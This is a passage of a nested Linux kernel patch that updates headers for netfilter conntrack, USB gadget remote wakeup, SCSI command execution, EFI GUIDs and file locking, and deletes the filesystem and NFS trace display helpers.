++} __packed __aligned(4);
+ 
+ struct bvec_iter_all {
+ 	struct bio_vec	bv;
+diff --git a/include/linux/decompress/mm.h b/include/linux/decompress/mm.h
+index 9192986b1a731..ac862422df158 100644
+--- a/include/linux/decompress/mm.h
++++ b/include/linux/decompress/mm.h
+@@ -48,7 +48,7 @@ MALLOC_VISIBLE void *malloc(int size)
+ 	if (!malloc_ptr)
+ 		malloc_ptr = free_mem_ptr;
+ 
+-	malloc_ptr = (malloc_ptr + 3) & ~3;     /* Align */
++	malloc_ptr = (malloc_ptr + 7) & ~7;     /* Align */
+ 
+ 	p = (void *)malloc_ptr;
+ 	malloc_ptr += size;
+diff --git a/include/linux/efi.h b/include/linux/efi.h
+index 4e1bfee9675d2..de6d6558a4d30 100644
+--- a/include/linux/efi.h
++++ b/include/linux/efi.h
+@@ -390,6 +390,7 @@ void efi_native_runtime_setup(void);
+ #define EFI_RT_PROPERTIES_TABLE_GUID		EFI_GUID(0xeb66918a, 0x7eef, 0x402a,  0x84, 0x2e, 0x93, 0x1d, 0x21, 0xc3, 0x8a, 0xe9)
+ #define EFI_DXE_SERVICES_TABLE_GUID		EFI_GUID(0x05ad34ba, 0x6f02, 0x4214,  0x95, 0x2e, 0x4d, 0xa0, 0x39, 0x8e, 0x2b, 0xb9)
+ #define EFI_SMBIOS_PROTOCOL_GUID		EFI_GUID(0x03583ff6, 0xcb36, 0x4940,  0x94, 0x7e, 0xb9, 0xb3, 0x9f, 0x4a, 0xfa, 0xf7)
++#define EFI_MEMORY_ATTRIBUTE_PROTOCOL_GUID	EFI_GUID(0xf4560cf6, 0x40ec, 0x4b4a,  0xa1, 0x92, 0xbf, 0x1d, 0x57, 0xd0, 0xb1, 0x89)
+ 
+ #define EFI_IMAGE_SECURITY_DATABASE_GUID	EFI_GUID(0xd719b2cb, 0x3d3a, 0x4596,  0xa3, 0xbc, 0xda, 0xd0, 0x0e, 0x67, 0x65, 0x6f)
+ #define EFI_SHIM_LOCK_GUID			EFI_GUID(0x605dab50, 0xe046, 0x4300,  0xab, 0xb6, 0x3d, 0xd8, 0x10, 0xdd, 0x8b, 0x23)
+diff --git a/include/linux/fs.h b/include/linux/fs.h
+index 67313881f8ac1..092d8fa10153f 100644
+--- a/include/linux/fs.h
++++ b/include/linux/fs.h
+@@ -1189,6 +1189,13 @@ extern void show_fd_locks(struct seq_file *f,
+ 			 struct file *filp, struct files_struct *files);
+ extern bool locks_owner_has_blockers(struct file_lock_context *flctx,
+ 			fl_owner_t owner);
++
++static inline struct file_lock_context *
++locks_inode_context(const struct inode *inode)
++{
++	return smp_load_acquire(&inode->i_flctx);
++}
++
+ #else /* !CONFIG_FILE_LOCKING */
+ static inline int fcntl_getlk(struct file *file, unsigned int cmd,
+ 			      struct flock __user *user)
+@@ -1334,6 +1341,13 @@ static inline bool locks_owner_has_blockers(struct file_lock_context *flctx,
+ {
+ 	return false;
+ }
++
++static inline struct file_lock_context *
++locks_inode_context(const struct inode *inode)
++{
++	return NULL;
++}
++
+ #endif /* !CONFIG_FILE_LOCKING */
+ 
+ static inline struct inode *file_inode(const struct file *f)
+diff --git a/include/linux/netfilter.h b/include/linux/netfilter.h
+index bef8db9d6c085..e5f4b6f8d1c09 100644
+--- a/include/linux/netfilter.h
++++ b/include/linux/netfilter.h
+@@ -437,11 +437,13 @@ nf_nat_decode_session(struct sk_buff *skb, struct flowi *fl, u_int8_t family)
+ #include <linux/netfilter/nf_conntrack_zones_common.h>
+ 
+ void nf_ct_attach(struct sk_buff *, const struct sk_buff *);
++void nf_ct_set_closing(struct nf_conntrack *nfct);
+ struct nf_conntrack_tuple;
+ bool nf_ct_get_tuple_skb(struct nf_conntrack_tuple *dst_tuple,
+ 			 const struct sk_buff *skb);
+ #else
+ static inline void nf_ct_attach(struct sk_buff *new, struct sk_buff *skb) {}
++static inline void nf_ct_set_closing(struct nf_conntrack *nfct) {}
+ struct nf_conntrack_tuple;
+ static inline bool nf_ct_get_tuple_skb(struct nf_conntrack_tuple *dst_tuple,
+ 				       const struct sk_buff *skb)
+@@ -459,6 +461,8 @@ struct nf_ct_hook {
+ 	bool (*get_tuple_skb)(struct nf_conntrack_tuple *,
+ 			      const struct sk_buff *);
+ 	void (*attach)(struct sk_buff *nskb, const struct sk_buff *skb);
++	void (*set_closing)(struct nf_conntrack *nfct);
++	int (*confirm)(struct sk_buff *skb);
+ };
+ extern const struct nf_ct_hook __rcu *nf_ct_hook;
+ 
+diff --git a/include/linux/nfs4.h b/include/linux/nfs4.h
+index 8d04b6a5964c4..730003c4f4af4 100644
+--- a/include/linux/nfs4.h
++++ b/include/linux/nfs4.h
+@@ -732,4 +732,17 @@ enum nfs4_setxattr_options {
+ 	SETXATTR4_CREATE	= 1,
+ 	SETXATTR4_REPLACE	= 2,
+ };
++
++enum {
++	RCA4_TYPE_MASK_RDATA_DLG	= 0,
++	RCA4_TYPE_MASK_WDATA_DLG	= 1,
++	RCA4_TYPE_MASK_DIR_DLG		= 2,
++	RCA4_TYPE_MASK_FILE_LAYOUT	= 3,
++	RCA4_TYPE_MASK_BLK_LAYOUT	= 4,
++	RCA4_TYPE_MASK_OBJ_LAYOUT_MIN	= 8,
++	RCA4_TYPE_MASK_OBJ_LAYOUT_MAX	= 9,
++	RCA4_TYPE_MASK_OTHER_LAYOUT_MIN	= 12,
++	RCA4_TYPE_MASK_OTHER_LAYOUT_MAX	= 15,
++};
++
+ #endif
+diff --git a/include/linux/usb/composite.h b/include/linux/usb/composite.h
+index 43ac3fa760dbe..9783b9107d76b 100644
+--- a/include/linux/usb/composite.h
++++ b/include/linux/usb/composite.h
+@@ -412,6 +412,8 @@ extern int composite_dev_prepare(struct usb_composite_driver *composite,
+ extern int composite_os_desc_req_prepare(struct usb_composite_dev *cdev,
+ 					 struct usb_ep *ep0);
+ void composite_dev_cleanup(struct usb_composite_dev *cdev);
++void check_remote_wakeup_config(struct usb_gadget *g,
++				struct usb_configuration *c);
+ 
+ static inline struct usb_composite_driver *to_cdriver(
+ 		struct usb_gadget_driver *gdrv)
+diff --git a/include/linux/usb/gadget.h b/include/linux/usb/gadget.h
+index dc3092cea99e9..5bec668b41dcd 100644
+--- a/include/linux/usb/gadget.h
++++ b/include/linux/usb/gadget.h
+@@ -309,6 +309,7 @@ struct usb_udc;
+ struct usb_gadget_ops {
+ 	int	(*get_frame)(struct usb_gadget *);
+ 	int	(*wakeup)(struct usb_gadget *);
++	int	(*set_remote_wakeup)(struct usb_gadget *, int set);
+ 	int	(*set_selfpowered) (struct usb_gadget *, int is_selfpowered);
+ 	int	(*vbus_session) (struct usb_gadget *, int is_active);
+ 	int	(*vbus_draw) (struct usb_gadget *, unsigned mA);
+@@ -383,6 +384,8 @@ struct usb_gadget_ops {
+  * @connected: True if gadget is connected.
+  * @lpm_capable: If the gadget max_speed is FULL or HIGH, this flag
+  *	indicates that it supports LPM as per the LPM ECN & errata.
++ * @wakeup_capable: True if gadget is capable of sending remote wakeup.
++ * @wakeup_armed: True if gadget is armed by the host for remote wakeup.
+  * @irq: the interrupt number for device controller.
+  * @id_number: a unique ID number for ensuring that gadget names are distinct
+  *
+@@ -444,6 +447,8 @@ struct usb_gadget {
+ 	unsigned			deactivated:1;
+ 	unsigned			connected:1;
+ 	unsigned			lpm_capable:1;
++	unsigned			wakeup_capable:1;
++	unsigned			wakeup_armed:1;
+ 	int				irq;
+ 	int				id_number;
+ };
+@@ -600,6 +605,7 @@ static inline int gadget_is_otg(struct usb_gadget *g)
+ #if IS_ENABLED(CONFIG_USB_GADGET)
+ int usb_gadget_frame_number(struct usb_gadget *gadget);
+ int usb_gadget_wakeup(struct usb_gadget *gadget);
++int usb_gadget_set_remote_wakeup(struct usb_gadget *gadget, int set);
+ int usb_gadget_set_selfpowered(struct usb_gadget *gadget);
+ int usb_gadget_clear_selfpowered(struct usb_gadget *gadget);
+ int usb_gadget_vbus_connect(struct usb_gadget *gadget);
+@@ -615,6 +621,8 @@ static inline int usb_gadget_frame_number(struct usb_gadget *gadget)
+ { return 0; }
+ static inline int usb_gadget_wakeup(struct usb_gadget *gadget)
+ { return 0; }
++static inline int usb_gadget_set_remote_wakeup(struct usb_gadget *gadget, int set)
++{ return 0; }
+ static inline int usb_gadget_set_selfpowered(struct usb_gadget *gadget)
+ { return 0; }
+ static inline int usb_gadget_clear_selfpowered(struct usb_gadget *gadget)
+diff --git a/include/net/ipv6_stubs.h b/include/net/ipv6_stubs.h
+index c48186bf47372..21da31e1dff5d 100644
+--- a/include/net/ipv6_stubs.h
++++ b/include/net/ipv6_stubs.h
+@@ -85,6 +85,11 @@ struct ipv6_bpf_stub {
+ 			       sockptr_t optval, unsigned int optlen);
+ 	int (*ipv6_getsockopt)(struct sock *sk, int level, int optname,
+ 			       sockptr_t optval, sockptr_t optlen);
++	int (*ipv6_dev_get_saddr)(struct net *net,
++				  const struct net_device *dst_dev,
++				  const struct in6_addr *daddr,
++				  unsigned int prefs,
++				  struct in6_addr *saddr);
+ };
+ extern const struct ipv6_bpf_stub *ipv6_bpf_stub __read_mostly;
+ 
+diff --git a/include/net/mctp.h b/include/net/mctp.h
+index 82800d521c3de..7ed84054f4623 100644
+--- a/include/net/mctp.h
++++ b/include/net/mctp.h
+@@ -249,6 +249,7 @@ struct mctp_route {
+ struct mctp_route *mctp_route_lookup(struct net *net, unsigned int dnet,
+ 				     mctp_eid_t daddr);
+ 
++/* always takes ownership of skb */
+ int mctp_local_output(struct sock *sk, struct mctp_route *rt,
+ 		      struct sk_buff *skb, mctp_eid_t daddr, u8 req_tag);
+ 
+diff --git a/include/net/netfilter/nf_conntrack.h b/include/net/netfilter/nf_conntrack.h
+index 6a2019aaa4644..3dbf947285be2 100644
+--- a/include/net/netfilter/nf_conntrack.h
++++ b/include/net/netfilter/nf_conntrack.h
+@@ -125,6 +125,12 @@ struct nf_conn {
+ 	union nf_conntrack_proto proto;
+ };
+ 
++static inline struct nf_conn *
++nf_ct_to_nf_conn(const struct nf_conntrack *nfct)
++{
++	return container_of(nfct, struct nf_conn, ct_general);
++}
++
+ static inline struct nf_conn *
+ nf_ct_tuplehash_to_ctrack(const struct nf_conntrack_tuple_hash *hash)
+ {
+@@ -175,6 +181,8 @@ nf_ct_get(const struct sk_buff *skb, enum ip_conntrack_info *ctinfo)
+ 
+ void nf_ct_destroy(struct nf_conntrack *nfct);
+ 
++void nf_conntrack_tcp_set_closing(struct nf_conn *ct);
++
+ /* decrement reference count on a conntrack */
+ static inline void nf_ct_put(struct nf_conn *ct)
+ {
+diff --git a/include/scsi/scsi_device.h b/include/scsi/scsi_device.h
+index d2751ed536df2..a64713fe52640 100644
+--- a/include/scsi/scsi_device.h
++++ b/include/scsi/scsi_device.h
+@@ -204,6 +204,7 @@ struct scsi_device {
+ 	unsigned use_10_for_rw:1; /* first try 10-byte read / write */
+ 	unsigned use_10_for_ms:1; /* first try 10-byte mode sense/select */
+ 	unsigned set_dbd_for_ms:1; /* Set "DBD" field in mode sense */
++	unsigned read_before_ms:1;	/* perform a READ before MODE SENSE */
+ 	unsigned no_report_opcodes:1;	/* no REPORT SUPPORTED OPERATION CODES */
+ 	unsigned no_write_same:1;	/* no WRITE SAME command */
+ 	unsigned use_16_for_rw:1; /* Use read/write(16) over read/write(10) */
+@@ -479,28 +480,51 @@ extern const char *scsi_device_state_name(enum scsi_device_state);
+ extern int scsi_is_sdev_device(const struct device *);
+ extern int scsi_is_target_device(const struct device *);
+ extern void scsi_sanitize_inquiry_string(unsigned char *s, int len);
+-extern int __scsi_execute(struct scsi_device *sdev, const unsigned char *cmd,
+-			int data_direction, void *buffer, unsigned bufflen,
+-			unsigned char *sense, struct scsi_sense_hdr *sshdr,
+-			int timeout, int retries, blk_opf_t flags,
+-			req_flags_t rq_flags, int *resid);
++
++/* Optional arguments to scsi_execute_cmd */
++struct scsi_exec_args {
++	unsigned char *sense;		/* sense buffer */
++	unsigned int sense_len;		/* sense buffer len */
++	struct scsi_sense_hdr *sshdr;	/* decoded sense header */
++	blk_mq_req_flags_t req_flags;	/* BLK_MQ_REQ flags */
++	int *resid;			/* residual length */
++};
++
++int scsi_execute_cmd(struct scsi_device *sdev, const unsigned char *cmd,
++		     blk_opf_t opf, void *buffer, unsigned int bufflen,
++		     int timeout, int retries,
++		     const struct scsi_exec_args *args);
++
+ /* Make sure any sense buffer is the correct size. */
+-#define scsi_execute(sdev, cmd, data_direction, buffer, bufflen, sense,	\
+-		     sshdr, timeout, retries, flags, rq_flags, resid)	\
++#define scsi_execute(_sdev, _cmd, _data_dir, _buffer, _bufflen, _sense,	\
++		     _sshdr, _timeout, _retries, _flags, _rq_flags,	\
++		     _resid)						\
+ ({									\
+-	BUILD_BUG_ON((sense) != NULL &&					\
+-		     sizeof(sense) != SCSI_SENSE_BUFFERSIZE);		\
+-	__scsi_execute(sdev, cmd, data_direction, buffer, bufflen,	\
+-		       sense, sshdr, timeout, retries, flags, rq_flags,	\
+-		       resid);						\
++	scsi_execute_cmd(_sdev, _cmd, (_data_dir == DMA_TO_DEVICE ?	\
++			 REQ_OP_DRV_OUT : REQ_OP_DRV_IN) | _flags,	\
++			 _buffer, _bufflen, _timeout, _retries,	\
++			 &(struct scsi_exec_args) {			\
++				.sense = _sense,			\
++				.sshdr = _sshdr,			\
++				.req_flags = _rq_flags & RQF_PM  ?	\
++						BLK_MQ_REQ_PM : 0,	\
++				.resid = _resid,			\
++			 });						\
+ })
++
+ static inline int scsi_execute_req(struct scsi_device *sdev,
+ 	const unsigned char *cmd, int data_direction, void *buffer,
+ 	unsigned bufflen, struct scsi_sense_hdr *sshdr, int timeout,
+ 	int retries, int *resid)
+ {
+-	return scsi_execute(sdev, cmd, data_direction, buffer,
+-		bufflen, NULL, sshdr, timeout, retries,  0, 0, resid);
++	return scsi_execute_cmd(sdev, cmd,
++				data_direction == DMA_TO_DEVICE ?
++				REQ_OP_DRV_OUT : REQ_OP_DRV_IN, buffer,
++				bufflen, timeout, retries,
++				&(struct scsi_exec_args) {
++					.sshdr = sshdr,
++					.resid = resid,
++				});
+ }
+ extern void sdev_disable_disk_events(struct scsi_device *sdev);
+ extern void sdev_enable_disk_events(struct scsi_device *sdev);
+diff --git a/include/trace/events/fs.h b/include/trace/events/fs.h
+deleted file mode 100644
+index 738b97f22f365..0000000000000
+--- a/include/trace/events/fs.h
++++ /dev/null
+@@ -1,122 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-/*
+- * Display helpers for generic filesystem items
+- *
+- * Author: Chuck Lever <chuck.lever@oracle.com>
+- *
+- * Copyright (c) 2020, Oracle and/or its affiliates.
+- */
+-
+-#include <linux/fs.h>
+-
+-#define show_fs_dirent_type(x) \
+-	__print_symbolic(x, \
+-		{ DT_UNKNOWN,		"UNKNOWN" }, \
+-		{ DT_FIFO,		"FIFO" }, \
+-		{ DT_CHR,		"CHR" }, \
+-		{ DT_DIR,		"DIR" }, \
+-		{ DT_BLK,		"BLK" }, \
+-		{ DT_REG,		"REG" }, \
+-		{ DT_LNK,		"LNK" }, \
+-		{ DT_SOCK,		"SOCK" }, \
+-		{ DT_WHT,		"WHT" })
+-
+-#define show_fs_fcntl_open_flags(x) \
+-	__print_flags(x, "|", \
+-		{ O_WRONLY,		"O_WRONLY" }, \
+-		{ O_RDWR,		"O_RDWR" }, \
+-		{ O_CREAT,		"O_CREAT" }, \
+-		{ O_EXCL,		"O_EXCL" }, \
+-		{ O_NOCTTY,		"O_NOCTTY" }, \
+-		{ O_TRUNC,		"O_TRUNC" }, \
+-		{ O_APPEND,		"O_APPEND" }, \
+-		{ O_NONBLOCK,		"O_NONBLOCK" }, \
+-		{ O_DSYNC,		"O_DSYNC" }, \
+-		{ O_DIRECT,		"O_DIRECT" }, \
+-		{ O_LARGEFILE,		"O_LARGEFILE" }, \
+-		{ O_DIRECTORY,		"O_DIRECTORY" }, \
+-		{ O_NOFOLLOW,		"O_NOFOLLOW" }, \
+-		{ O_NOATIME,		"O_NOATIME" }, \
+-		{ O_CLOEXEC,		"O_CLOEXEC" })
+-
+-#define __fmode_flag(x)	{ (__force unsigned long)FMODE_##x, #x }
+-#define show_fs_fmode_flags(x) \
+-	__print_flags(x, "|", \
+-		__fmode_flag(READ), \
+-		__fmode_flag(WRITE), \
+-		__fmode_flag(EXEC))
+-
+-#ifdef CONFIG_64BIT
+-#define show_fs_fcntl_cmd(x) \
+-	__print_symbolic(x, \
+-		{ F_DUPFD,		"DUPFD" }, \
+-		{ F_GETFD,		"GETFD" }, \
+-		{ F_SETFD,		"SETFD" }, \
+-		{ F_GETFL,		"GETFL" }, \
+-		{ F_SETFL,		"SETFL" }, \
+-		{ F_GETLK,		"GETLK" }, \
+-		{ F_SETLK,		"SETLK" }, \
+-		{ F_SETLKW,		"SETLKW" }, \
+-		{ F_SETOWN,		"SETOWN" }, \
+-		{ F_GETOWN,		"GETOWN" }, \
+-		{ F_SETSIG,		"SETSIG" }, \
+-		{ F_GETSIG,		"GETSIG" }, \
+-		{ F_SETOWN_EX,		"SETOWN_EX" }, \
+-		{ F_GETOWN_EX,		"GETOWN_EX" }, \
+-		{ F_GETOWNER_UIDS,	"GETOWNER_UIDS" }, \
+-		{ F_OFD_GETLK,		"OFD_GETLK" }, \
+-		{ F_OFD_SETLK,		"OFD_SETLK" }, \
+-		{ F_OFD_SETLKW,		"OFD_SETLKW" })
+-#else /* CONFIG_64BIT */
+-#define show_fs_fcntl_cmd(x) \
+-	__print_symbolic(x, \
+-		{ F_DUPFD,		"DUPFD" }, \
+-		{ F_GETFD,		"GETFD" }, \
+-		{ F_SETFD,		"SETFD" }, \
+-		{ F_GETFL,		"GETFL" }, \
+-		{ F_SETFL,		"SETFL" }, \
+-		{ F_GETLK,		"GETLK" }, \
+-		{ F_SETLK,		"SETLK" }, \
+-		{ F_SETLKW,		"SETLKW" }, \
+-		{ F_SETOWN,		"SETOWN" }, \
+-		{ F_GETOWN,		"GETOWN" }, \
+-		{ F_SETSIG,		"SETSIG" }, \
+-		{ F_GETSIG,		"GETSIG" }, \
+-		{ F_GETLK64,		"GETLK64" }, \
+-		{ F_SETLK64,		"SETLK64" }, \
+-		{ F_SETLKW64,		"SETLKW64" }, \
+-		{ F_SETOWN_EX,		"SETOWN_EX" }, \
+-		{ F_GETOWN_EX,		"GETOWN_EX" }, \
+-		{ F_GETOWNER_UIDS,	"GETOWNER_UIDS" }, \
+-		{ F_OFD_GETLK,		"OFD_GETLK" }, \
+-		{ F_OFD_SETLK,		"OFD_SETLK" }, \
+-		{ F_OFD_SETLKW,		"OFD_SETLKW" })
+-#endif /* CONFIG_64BIT */
+-
+-#define show_fs_fcntl_lock_type(x) \
+-	__print_symbolic(x, \
+-		{ F_RDLCK,		"RDLCK" }, \
+-		{ F_WRLCK,		"WRLCK" }, \
+-		{ F_UNLCK,		"UNLCK" })
+-
+-#define show_fs_lookup_flags(flags) \
+-	__print_flags(flags, "|", \
+-		{ LOOKUP_FOLLOW,	"FOLLOW" }, \
+-		{ LOOKUP_DIRECTORY,	"DIRECTORY" }, \
+-		{ LOOKUP_AUTOMOUNT,	"AUTOMOUNT" }, \
+-		{ LOOKUP_EMPTY,		"EMPTY" }, \
+-		{ LOOKUP_DOWN,		"DOWN" }, \
+-		{ LOOKUP_MOUNTPOINT,	"MOUNTPOINT" }, \
+-		{ LOOKUP_REVAL,		"REVAL" }, \
+-		{ LOOKUP_RCU,		"RCU" }, \
+-		{ LOOKUP_OPEN,		"OPEN" }, \
+-		{ LOOKUP_CREATE,	"CREATE" }, \
+-		{ LOOKUP_EXCL,		"EXCL" }, \
+-		{ LOOKUP_RENAME_TARGET,	"RENAME_TARGET" }, \
+-		{ LOOKUP_PARENT,	"PARENT" }, \
+-		{ LOOKUP_NO_SYMLINKS,	"NO_SYMLINKS" }, \
+-		{ LOOKUP_NO_MAGICLINKS,	"NO_MAGICLINKS" }, \
+-		{ LOOKUP_NO_XDEV,	"NO_XDEV" }, \
+-		{ LOOKUP_BENEATH,	"BENEATH" }, \
+-		{ LOOKUP_IN_ROOT,	"IN_ROOT" }, \
+-		{ LOOKUP_CACHED,	"CACHED" })
+diff --git a/include/trace/events/nfs.h b/include/trace/events/nfs.h
+deleted file mode 100644
+index 09ffdbb04134d..0000000000000
+--- a/include/trace/events/nfs.h
++++ /dev/null
+@@ -1,375 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-/*
+- * Display helpers for NFS protocol elements
+- *
+- * Author: Chuck Lever <chuck.lever@oracle.com>
+- *
+- * Copyright (c) 2020, Oracle and/or its affiliates.
+- */
+-
+-#include <linux/nfs.h>
+-#include <linux/nfs4.h>
+-#include <uapi/linux/nfs.h>
+-
+-TRACE_DEFINE_ENUM(NFS_OK);
+-TRACE_DEFINE_ENUM(NFSERR_PERM);
+-TRACE_DEFINE_ENUM(NFSERR_NOENT);
+-TRACE_DEFINE_ENUM(NFSERR_IO);
+-TRACE_DEFINE_ENUM(NFSERR_NXIO);
+-TRACE_DEFINE_ENUM(NFSERR_EAGAIN);
+-TRACE_DEFINE_ENUM(NFSERR_ACCES);
+-TRACE_DEFINE_ENUM(NFSERR_EXIST);
+-TRACE_DEFINE_ENUM(NFSERR_XDEV);
+-TRACE_DEFINE_ENUM(NFSERR_NODEV);
+-TRACE_DEFINE_ENUM(NFSERR_NOTDIR);
+-TRACE_DEFINE_ENUM(NFSERR_ISDIR);
+-TRACE_DEFINE_ENUM(NFSERR_INVAL);
+-TRACE_DEFINE_ENUM(NFSERR_FBIG);
+-TRACE_DEFINE_ENUM(NFSERR_NOSPC);
+-TRACE_DEFINE_ENUM(NFSERR_ROFS);
+-TRACE_DEFINE_ENUM(NFSERR_MLINK);
+-TRACE_DEFINE_ENUM(NFSERR_OPNOTSUPP);
+-TRACE_DEFINE_ENUM(NFSERR_NAMETOOLONG);
+-TRACE_DEFINE_ENUM(NFSERR_NOTEMPTY);
+-TRACE_DEFINE_ENUM(NFSERR_DQUOT);
+-TRACE_DEFINE_ENUM(NFSERR_STALE);
+-TRACE_DEFINE_ENUM(NFSERR_REMOTE);
+-TRACE_DEFINE_ENUM(NFSERR_WFLUSH);
+-TRACE_DEFINE_ENUM(NFSERR_BADHANDLE);
+-TRACE_DEFINE_ENUM(NFSERR_NOT_SYNC);
+-TRACE_DEFINE_ENUM(NFSERR_BAD_COOKIE);
+-TRACE_DEFINE_ENUM(NFSERR_NOTSUPP);
+-TRACE_DEFINE_ENUM(NFSERR_TOOSMALL);
+-TRACE_DEFINE_ENUM(NFSERR_SERVERFAULT);
+-TRACE_DEFINE_ENUM(NFSERR_BADTYPE);
+-TRACE_DEFINE_ENUM(NFSERR_JUKEBOX);
+-
+-#define show_nfs_status(x) \
+-	__print_symbolic(x, \
+-		{ NFS_OK,			"OK" }, \
+-		{ NFSERR_PERM,			"PERM" }, \
+-		{ NFSERR_NOENT,			"NOENT" }, \
+-		{ NFSERR_IO,			"IO" }, \
+-		{ NFSERR_NXIO,			"NXIO" }, \
+-		{ ECHILD,			"CHILD" }, \
+-		{ NFSERR_EAGAIN,		"AGAIN" }, \
+-		{ NFSERR_ACCES,			"ACCES" }, \
+-		{ NFSERR_EXIST,			"EXIST" }, \
+-		{ NFSERR_XDEV,			"XDEV" }, \
+-		{ NFSERR_NODEV,			"NODEV" }, \
+-		{ NFSERR_NOTDIR,		"NOTDIR" }, \
+-		{ NFSERR_ISDIR,			"ISDIR" }, \
+-		{ NFSERR_INVAL,			"INVAL" }, \
+-		{ NFSERR_FBIG,			"FBIG" }, \
+-		{ NFSERR_NOSPC,			"NOSPC" }, \
+-		{ NFSERR_ROFS,			"ROFS" }, \
+-		{ NFSERR_MLINK,			"MLINK" }, \
+-		{ NFSERR_OPNOTSUPP,		"OPNOTSUPP" }, \
+-		{ NFSERR_NAMETOOLONG,		"NAMETOOLONG" }, \
+-		{ NFSERR_NOTEMPTY,		"NOTEMPTY" }, \
+-		{ NFSERR_DQUOT,			"DQUOT" }, \
+-		{ NFSERR_STALE,			"STALE" }, \
+-		{ NFSERR_REMOTE,		"REMOTE" }, \
+-		{ NFSERR_WFLUSH,		"WFLUSH" }, \
+-		{ NFSERR_BADHANDLE,		"BADHANDLE" }, \
+-		{ NFSERR_NOT_SYNC,		"NOTSYNC" }, \
+-		{ NFSERR_BAD_COOKIE,		"BADCOOKIE" }, \
+-		{ NFSERR_NOTSUPP,		"NOTSUPP" }, \
+-		{ NFSERR_TOOSMALL,		"TOOSMALL" }, \
+-		{ NFSERR_SERVERFAULT,		"REMOTEIO" }, \
+-		{ NFSERR_BADTYPE,		"BADTYPE" }, \
+-		{ NFSERR_JUKEBOX,		"JUKEBOX" })
+-
+-TRACE_DEFINE_ENUM(NFS_UNSTABLE);
+-TRACE_DEFINE_ENUM(NFS_DATA_SYNC);
+-TRACE_DEFINE_ENUM(NFS_FILE_SYNC);
+-
+-#define show_nfs_stable_how(x) \
+-	__print_symbolic(x, \
+-		{ NFS_UNSTABLE,			"UNSTABLE" }, \
+-		{ NFS_DATA_SYNC,		"DATA_SYNC" }, \
+-		{ NFS_FILE_SYNC,		"FILE_SYNC" })
+-
+-TRACE_DEFINE_ENUM(NFS4_OK);
+-TRACE_DEFINE_ENUM(NFS4ERR_ACCESS);
+-TRACE_DEFINE_ENUM(NFS4ERR_ATTRNOTSUPP);
+-TRACE_DEFINE_ENUM(NFS4ERR_ADMIN_REVOKED);
+-TRACE_DEFINE_ENUM(NFS4ERR_BACK_CHAN_BUSY);
+-TRACE_DEFINE_ENUM(NFS4ERR_BADCHAR);
+-TRACE_DEFINE_ENUM(NFS4ERR_BADHANDLE);
+-TRACE_DEFINE_ENUM(NFS4ERR_BADIOMODE);
+-TRACE_DEFINE_ENUM(NFS4ERR_BADLAYOUT);
+-TRACE_DEFINE_ENUM(NFS4ERR_BADLABEL);
+-TRACE_DEFINE_ENUM(NFS4ERR_BADNAME);
+-TRACE_DEFINE_ENUM(NFS4ERR_BADOWNER);
+-TRACE_DEFINE_ENUM(NFS4ERR_BADSESSION);
+-TRACE_DEFINE_ENUM(NFS4ERR_BADSLOT);
+-TRACE_DEFINE_ENUM(NFS4ERR_BADTYPE);
+-TRACE_DEFINE_ENUM(NFS4ERR_BADXDR);
+-TRACE_DEFINE_ENUM(NFS4ERR_BAD_COOKIE);
+-TRACE_DEFINE_ENUM(NFS4ERR_BAD_HIGH_SLOT);
+-TRACE_DEFINE_ENUM(NFS4ERR_BAD_RANGE);
+-TRACE_DEFINE_ENUM(NFS4ERR_BAD_SEQID);
+-TRACE_DEFINE_ENUM(NFS4ERR_BAD_SESSION_DIGEST);
+-TRACE_DEFINE_ENUM(NFS4ERR_BAD_STATEID);
+-TRACE_DEFINE_ENUM(NFS4ERR_CB_PATH_DOWN);
+-TRACE_DEFINE_ENUM(NFS4ERR_CLID_INUSE);
+-TRACE_DEFINE_ENUM(NFS4ERR_CLIENTID_BUSY);
+-TRACE_DEFINE_ENUM(NFS4ERR_COMPLETE_ALREADY);
+-TRACE_DEFINE_ENUM(NFS4ERR_CONN_NOT_BOUND_TO_SESSION);
+-TRACE_DEFINE_ENUM(NFS4ERR_DEADLOCK);
+-TRACE_DEFINE_ENUM(NFS4ERR_DEADSESSION);
+-TRACE_DEFINE_ENUM(NFS4ERR_DELAY);
+-TRACE_DEFINE_ENUM(NFS4ERR_DELEG_ALREADY_WANTED);
+-TRACE_DEFINE_ENUM(NFS4ERR_DELEG_REVOKED);
+-TRACE_DEFINE_ENUM(NFS4ERR_DENIED);
+-TRACE_DEFINE_ENUM(NFS4ERR_DIRDELEG_UNAVAIL);
+-TRACE_DEFINE_ENUM(NFS4ERR_DQUOT);
+-TRACE_DEFINE_ENUM(NFS4ERR_ENCR_ALG_UNSUPP);
+-TRACE_DEFINE_ENUM(NFS4ERR_EXIST);
+-TRACE_DEFINE_ENUM(NFS4ERR_EXPIRED);
+-TRACE_DEFINE_ENUM(NFS4ERR_FBIG);
+-TRACE_DEFINE_ENUM(NFS4ERR_FHEXPIRED);
+-TRACE_DEFINE_ENUM(NFS4ERR_FILE_OPEN);
+-TRACE_DEFINE_ENUM(NFS4ERR_GRACE);
+-TRACE_DEFINE_ENUM(NFS4ERR_HASH_ALG_UNSUPP);
+-TRACE_DEFINE_ENUM(NFS4ERR_INVAL);
+-TRACE_DEFINE_ENUM(NFS4ERR_IO);
+-TRACE_DEFINE_ENUM(NFS4ERR_ISDIR);
+-TRACE_DEFINE_ENUM(NFS4ERR_LAYOUTTRYLATER);
+-TRACE_DEFINE_ENUM(NFS4ERR_LAYOUTUNAVAILABLE);
+-TRACE_DEFINE_ENUM(NFS4ERR_LEASE_MOVED);
+-TRACE_DEFINE_ENUM(NFS4ERR_LOCKED);
+-TRACE_DEFINE_ENUM(NFS4ERR_LOCKS_HELD);
+-TRACE_DEFINE_ENUM(NFS4ERR_LOCK_RANGE);
+-TRACE_DEFINE_ENUM(NFS4ERR_MINOR_VERS_MISMATCH);
+-TRACE_DEFINE_ENUM(NFS4ERR_MLINK);
+-TRACE_DEFINE_ENUM(NFS4ERR_MOVED);
+-TRACE_DEFINE_ENUM(NFS4ERR_NAMETOOLONG);
+-TRACE_DEFINE_ENUM(NFS4ERR_NOENT);
+-TRACE_DEFINE_ENUM(NFS4ERR_NOFILEHANDLE);
+-TRACE_DEFINE_ENUM(NFS4ERR_NOMATCHING_LAYOUT);
+-TRACE_DEFINE_ENUM(NFS4ERR_NOSPC);
+-TRACE_DEFINE_ENUM(NFS4ERR_NOTDIR);
+-TRACE_DEFINE_ENUM(NFS4ERR_NOTEMPTY);
+-TRACE_DEFINE_ENUM(NFS4ERR_NOTSUPP);
+-TRACE_DEFINE_ENUM(NFS4ERR_NOT_ONLY_OP);
